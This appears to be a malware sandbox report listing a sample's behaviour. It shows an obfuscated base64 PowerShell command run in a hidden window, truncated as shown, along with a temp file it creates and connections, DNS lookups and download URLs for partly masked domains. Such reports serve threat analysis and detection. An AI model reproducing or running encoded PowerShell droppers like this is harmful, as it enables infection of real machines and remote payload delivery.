Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAEUAUgBVAEMAdQB0AHYAPQAnAFgAQwBKAFEATwBqAGQAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAUgBJAFQAeQBwAHIATwBgAFQAbwBgAEMAYABvAGwAIgAgAD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1952
Modifies file system
Creates the following files
- %TEMP%\1079058.cvr
Network activity
Connects to
- 'ju####kongyt.com':80
- 'je###alk.com':443
- 'pk#.goog':80
- 'cs####ldersllc.com':443
- 'ar###edia.pl':80
TCP
HTTP GET requests
- http://ju####kongyt.com/crm/52p1_drac_sc9/
- http://pk#.goog/gsr1/gsr1.crt
- http://ar###edia.pl/ca/al4_9dxus_dj5wer6/
Other
- 'je###alk.com':443
- 'cs####ldersllc.com':443
UDP
- DNS ASK ju####kongyt.com
- DNS ASK je###alk.com
- DNS ASK pk#.goog
- DNS ASK cs####ldersllc.com
- DNS ASK bl##.#unarbe.org.br
- DNS ASK ar###edia.pl
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAEUAUgBVAEMAdQB0AHYAPQAnAFgAQwBKAFEATwBqAGQAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAUgBJAFQAeQBwAHIATwBgAFQAbwBgAEMAYABvAGwAIgAgAD...' (with hidden window)
